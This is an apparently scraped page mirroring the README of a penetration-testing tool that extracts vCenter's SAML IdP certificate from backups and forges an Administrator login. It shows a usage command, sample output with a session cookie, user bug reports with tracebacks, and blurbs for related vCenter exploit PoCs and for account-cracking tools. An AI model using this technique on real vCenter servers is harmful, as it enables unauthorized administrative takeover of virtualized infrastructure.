A tool to extract the IdP cert from vCenter backups and log in as Administrator

Last update: Dec 31, 2022

Overview

vCenter SAML Login Tool

A tool to extract the Identity Provider (IdP) cert from vCenter backups and log in as Administrator

Background

Commonly, during engagements, we will gain access to vCenter backups on a fileserver or gain root access to the VCSA host through recent CVEs. Logging into the vCenter vSphere UI allows us to easily gain access to more systems, confidential information, as well as show customers the impact of these findings.

The data.mdb file contains the certificates and can be found within vCenter backups as well as on the VCSA host with root permissions. These certificates are stored in cleartext and can be used to sign any SAML authentication request for any user - including the builtin Administrator.

If you'd like to know more about several use cases for this tool and how we've used it to gain Administrative access to vCenter hosts check out our blog post: https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/

Usage

root@kali:~/vcenter# python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200
[*] Successfully extracted the IdP certificate
[*] Successfully extracted trusted certificate 1
[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname vcsa.olympus for 10.0.100.200
[*] Initiating SAML request with 10.0.100.200
[*] Generating SAML assertion
[*] Signing the SAML assertion
[*] Attempting to log into vCenter with the signed SAML request
[+] Successfuly obtained Administrator cookie for 10.0.100.200!
[+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640

With the above cookie, visit the VCSA instance at https:// /ui, add the cookie under the /ui path, and re-browse to https:// /ui.

Demonstration

Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

Comments

Exception: expected 302 redirect

Hello,

I keep getting this error and have no clue why is that.

[*] Successfully extracted the IdP certificate
[*] CN: cn=TrustedCertChain-1,cn=TrustedCertificateChains,cn=<redacted>.local,cn=Tenants,cn=IdentityManager,cn=Services,dc=<redacted>,dc=local
[*] Domain: <redacted>.local
[*] Successfully extracted trusted certificate 1
[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname <redacted>.<redacted>.local for <redacted>
[*] Initiating SAML request with <redacted>
[-] Failed initiating SAML request with <redacted>
Traceback (most recent call last):
  File "/home/morpheus/stuff/vcenter_saml_login/vcenter_saml_login.py", line 347, in <module>
    req = saml_request(args.target)
  File "/home/morpheus/stuff/vcenter_saml_login/vcenter_saml_login.py", line 241, in saml_request
    raise Exception("expected 302 redirect")
Exception: expected 302 redirect

I did check a little bit and if I understand correctly, the code expects to 302 redirect and gives exception when it doesn't. The thing is, the host is making 302 redirect but still, I'm getting this exception. Any help, suggestions will be priceless. Thanks.

opened by Blackh4n 9

An error occurred

Hello, I can't execute python. It may be caused by the certificate. I need help.

python3 vcenter_saml_login.py -p data.mdb -t 172.31.0.10 [*] Successfully extracted the IdP certificate [-] Failed to find the trusted certificate 1 Traceback (most recent call last): File "vcenter_saml_login.py", line 295, in trusted_cert_1, domain = get_trusted_cert1(bin_stream, args.verbose) TypeError: cannot unpack non-iterable NoneType object

opened by Hosrg 7
Failed logging in with SAML request.(expected 302 redirect)

Any idea what could have gone wrong? Ver: VMware VirtualCenter 7.0.2 build-17920168 [-] Failed logging in with SAML request Traceback (most recent call last): File "/Users/vcenter_saml_login.py", line 351, in <module> c = login(args.target, s) File "/Users/vcenter_saml_login.py", line 301, in login raise Exception("expected 302 redirect") Exception: expected 302 redirect Response: [400] An error occurred while processing the authentication response from the vCenter Single Sign-On server. Details: HTTP error code: 403, status: BadResponse, sub status: Issuer not trusted: .

opened by kingz40o 1
Add license

Hello, I would like to contribute to the code adding a more reliable validation for keys and certs, but there is no license in this repository. Please add some sort auf license to the repository. No license generally means you have no permission from the creators of the software to use, modify, or share the software. More info here https://choosealicense.com/no-permission/

opened by bpg-it-raphaeljohn 1
Cookie not working

Hello!

The script reports Successfuly obtained Administrator cookie for .... but when I paste the value in the corresponding field the auth not working, just throws back to login screen. As I check its working with vcenter 6.x but not success in vcenter 7.0.3.

Any idea? Thx!

opened by Q1984 1
Fix 'get_domain_from_cn'

One should replace the 'lstrip' function call at 'get_domain_from_cn' with any alternative (e.g. 'removeprefix') since it strips extra characters (e.g. when the last domain part is 'dc=com').

Thank you!

opened by Resolk 1

[-] Failed signing the SAML assertion ('Could not deserialize key data')

Did anyone else have issues with "Failed signing the SAML assertion"?

python3 vcenter_saml_login.py -p data.mdb -t <IP>  -v
[*] Extracted IdP certificate:
-----BEGIN PRIVATE KEY-----
...
-----END PRIVATE KEY-----

[*] Successfully extracted the IdP certificate
[!] Looking for cert 1 at position: 69734592
[!] CN end position: 69735640
[*] CN: cn=TrustedCertChain-1,cn=TrustedCertificateChains,cn=<DOMAIN>.<DOMAIN>,cn=Tenants,cn=IdentityManager,cn=Seces,dc=<DOMAIN>,dc=<DOMAIN>
[*] Domain: <DOMAIN>.<DOMAIN>
[!] Cert 1 size: 999
[*] Extracted Trusted certificate:
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----

[*] Successfully extracted trusted certificate 1
Cert 2 Size: 1053
[*] Extracted Trusted certificate:
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----

[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname <FQDN> for <IP>
[*] Initiating SAML request with <IP>
[*] Generating SAML assertion
[*] Signing the SAML assertion
[-] Failed signing the SAML assertion
Traceback (most recent call last):
  File "<PATH>/Log4jCenter/utils/vcenter_saml_login/vcenter_saml_login.py", line 349, in <module>
    s = sign_assertion(t, trusted_cert_1, trusted_cert_2, idp_cert)
  File "<PATH>/Log4jCenter/utils/vcenter_saml_login/vcenter_saml_login.py", line 281, in sign_assertion
    signed_assertion = signer.sign(root, reference_uri=assertion_id, key=key, cert=[cert1, cert2])
  File "/usr/local/lib/python3.9/dist-packages/signxml/__init__.py", line 398, in sign
    key = load_pem_private_key(ensure_bytes(key), password=passphrase, backend=default_backend())
  File "/usr/local/lib/python3.9/dist-packages/cryptography/hazmat/primitives/serialization/base.py", line 22, in d_pem_private_key
    return ossl.load_pem_private_key(data, password)
  File "/usr/local/lib/python3.9/dist-packages/cryptography/hazmat/backends/openssl/backend.py", line 823, in loadm_private_key
    return self._load_key(
  File "/usr/local/lib/python3.9/dist-packages/cryptography/hazmat/backends/openssl/backend.py", line 1070, in _lokey
    self._handle_key_loading_error()
  File "/usr/local/lib/python3.9/dist-packages/cryptography/hazmat/backends/openssl/backend.py", line 1129, in _hae_key_loading_error
    raise ValueError(
ValueError: ('Could not deserialize key data. The data may be in an incorrect format, it may be encrypted with an upported algorithm, or it may be an unsupported key type (e.g. EC curves with explicit parameters).', [_OpenSSLErrithText(code=218529960, lib=13, reason=168, reason_text=b'error:0D0680A8:asn1 encoding routines:asn1_check_tlen:wr tag'), _OpenSSLErrorWithText(code=218546234, lib=13, reason=58, reason_text=b'error:0D06C03A:asn1 encoding routinasn1_d2i_ex_primitive:nested asn1 error'), _OpenSSLErrorWithText(code=218640442, lib=13, reason=58, reason_text=b'or:0D08303A:asn1 encoding routines:asn1_template_noexp_d2i:nested asn1 error'), _OpenSSLErrorWithText(code=1514987 lib=9, reason=13, reason_text=b'error:0907B00D:PEM routines:PEM_read_bio_PrivateKey:ASN1 lib')])

I get the same error when trying to "check" the key with openssl:

 openssl rsa -in private.key -check    
   
unable to load Private Key
139866836145536:error:0D0680A8:asn1 encoding routines:asn1_check_tlen:wrong tag:../crypto/asn1/tasn_dec.c:1149:
139866836145536:error:0D06C03A:asn1 encoding routines:asn1_d2i_ex_primitive:nested asn1 error:../crypto/asn1/tasn_dec.c:713:
139866836145536:error:0D08303A:asn1 encoding routines:asn1_template_noexp_d2i:nested asn1 error:../crypto/asn1/tasn_dec.c:646:Field=version, Type=PKCS8_PRIV_KEY_INFO
139866836145536:error:0907B00D:PEM routines:PEM_read_bio_PrivateKey:ASN1 lib:../crypto/pem/pem_pkey.c:88:

opened by corsch 1

Add better validation of keys and certificates

This should differentiate better between keys and certificates by adding a validation function for both. Probably fixes #6

Thanks for adding the license.

opened by bpg-it-raphaeljohn 0
An error is reported when the script is running

root@kent:~/CVE-2021-22005-exp# python3 vcenter_saml_login.py -p data.mdb -t xxx.xx.xxx.xxx [] Successfully extracted the IdP certificate [] CN: cn=TrustedCertChain-1,cn=TrustedCertificateChains,CN=e4ed3720-803d-4d2e-bbd1-3b5221182357,CN=Ldus,CN=ComponentManager,DC=vsphere,DC=local [] Domain: vsphere.local [] Successfully extracted trusted certificate 1 [] Successfully extracted trusted certificate 2 [] Obtaining hostname from vCenter SSL certificate [] Found hostname vcenter.tech.zone for xxx.xx.xxx.xxx [] Initiating SAML request with xxx.xx.xxx.xxx [] Generating SAML assertion [] Signing the SAML assertion [*] Attempting to log into vCenter with the signed SAML request [-] Failed logging in with SAML request Traceback (most recent call last): File "/root/CVE-2021-22005-exp/vcenter_saml_login.py", line 350, in c = login(args.target, s) File "/root/CVE-2021-22005-exp/vcenter_saml_login.py", line 300, in login raise Exception("expected 302 redirect") Exception: expected 302 redirect

xxx.xx.xxx.xxx Is an Internet IP

opened by Chinakentgao 6
vCenter 7.0.3 Support

I was recently on an engagement and identified a vCenter 7.0.3 server. After troubleshooting this script I determined that this version requires a POST parameter RelayState for successful authentication. This change adds the RelayState parameter to add support for vCenter 7.0.3.

This could break compatibility with older versions and should be tested.

opened by Xerzzul 2

Owner

Horizon 3 AI Inc

AI-powered Pen Tests. See your enterprise through the eyes of an attacker & fix what matters.

GitHub

Exploiting CVE-2021-44228 in vCenter for remote code execution and more

Log4jCenter Exploiting CVE-2021-44228 in vCenter for remote code execution and more. Blog post detailing exploitation linked below: COMING SOON Why? P

81 Dec 20, 2022

Proof of Concept Exploit for vCenter CVE-2021-21972

CVE-2021-21972 Proof of Concept Exploit for vCenter CVE-2021-21972

210 Dec 31, 2022

CVE-2021-21985 VMware vCenter Server远程代码执行漏洞 EXP (更新可回显EXP)

CVE-2021-21985 CVE-2021-21985 EXP 本文以及工具仅限技术分享，严禁用于非法用途，否则产生的一切后果自行承担。 0x01 利用Tomcat RMI RCE 1. VPS启动JNDI监听 1099 端口 rmi需要bypass高版本jdk java -jar JNDIIn

355 Aug 3, 2022

the metasploit script(POC/EXP) about CVE-2021-22005 VMware vCenter Server contains an arbitrary file upload vulnerability

CVE-2021-22005-metasploit the metasploit script(POC/EXP) about CVE-2021-22005 VMware vCenter Server contains an arbitrary file upload vulnerability pr

25 Nov 15, 2022

VMware vCenter earlier v(7.0.2.00100) unauthorized arbitrary file read

vcenter_fileread_exploit VMware vCenter earlier v(7.0.2.00100) unauthorized arbitrary file read Usage python3 vCenter_fileread.py http(s)://ip Referen

4 Sep 23, 2022

orfipy is a tool written in python/cython to extract ORFs in an extremely and fast and flexible manner

Introduction orfipy is a tool written in python/cython to extract ORFs in an extremely and fast and flexible manner. Other popular ORF searching tools

34 Nov 21, 2022

This is python script that will extract the functions call in all used DLL in an executable and then provide a mapping of those functions to the attack classes defined and curated malapi.io.

F2Amapper This is python script that will extract the functions call in all used DLL in an executable and then provide a mapping of those functions to

3 Sep 3, 2022

Python library to remotely extract credentials on a set of hosts.

1.5k Dec 31, 2022

A simple Burp Suite extension to extract datas from source code

DataExtractor A simple Burp Suite extension to extract datas from source code. Features in scope parsing file extensions to ignore files exclusion bas

86 Dec 31, 2022

A burp-suite plugin that extract all parameter names from in-scope requests

ParamsExtractor A burp-suite plugin that extract all parameters name from in-scope requests. You can run the plugin while you are working on the targe

29 Nov 9, 2022

A script to extract SNESticle from Fight Night Round 2

fn22snesticle.py A script for producing a SNESticle ISO from a Fight Night Round 2 ISO and any SNES ROM. Background Fight Night Round 2 is a boxing ga

57 Nov 22, 2022

All in One CRACKER911181's Tool. This Tool For Hacking and Pentesting. 🎭

All in One CRACKER911181's Tool. This Tool For Hacking and Pentesting. ??

331 Jan 1, 2023

All in One CRACKER911181's Tool. This Tool For Hacking and Pentesting.🎭

This is A Python & Bash Programming Based Termux-Tool Created By CRACKER911181. This Tool Created For Hacking and Pentesting. If You Use This Tool To Evil Purpose,The Owner Will Never be Responsible For That.

1 Jan 10, 2022

Vulnerability Scanner & Auto Exploiter You can use this tool to check the security by finding the vulnerability in your website or you can use this tool to Get Shells

About create a target list or select one target, scans then exploits, done! Vulnnr is a Vulnerability Scanner & Auto Exploiter You can use this tool t

108 Dec 4, 2021

Facebook account cloning/hacking advanced tool + dictionary attack added | Facebook automation tool

loggef Facebook automation tool, Facebook account hacking and cloning advanced tool + dictionary attack added Warning Use this tool for educational pu

149 Aug 10, 2022

labsecurity is a tool that brings together python scripts made for ethical hacking, in a single tool, through a console interface

labsecurity labsecurity is a tool that brings together python scripts made for ethical hacking, in a single tool, through a console interface. Warning

16 Dec 8, 2022

A tool to brute force a gmail account. Use this tool to crack multiple accounts

A tool to brute force a gmail account. Use this tool to crack multiple accounts. This tool is developed to crack multiple accounts

12 Dec 30, 2022

Osint-Tool - Information collection tool in python

Osint-Tool Herramienta para la recolección de información Pronto más opciones In

3 Apr 9, 2022

Dome - Subdomain Enumeration Tool. Fast and reliable python script that makes active and/or passive scan to obtain subdomains and search for open ports.

DOME - A subdomain enumeration tool Check the Spanish Version Dome is a fast and reliable python script that makes active and/or passive scan to obtai

329 Jan 1, 2023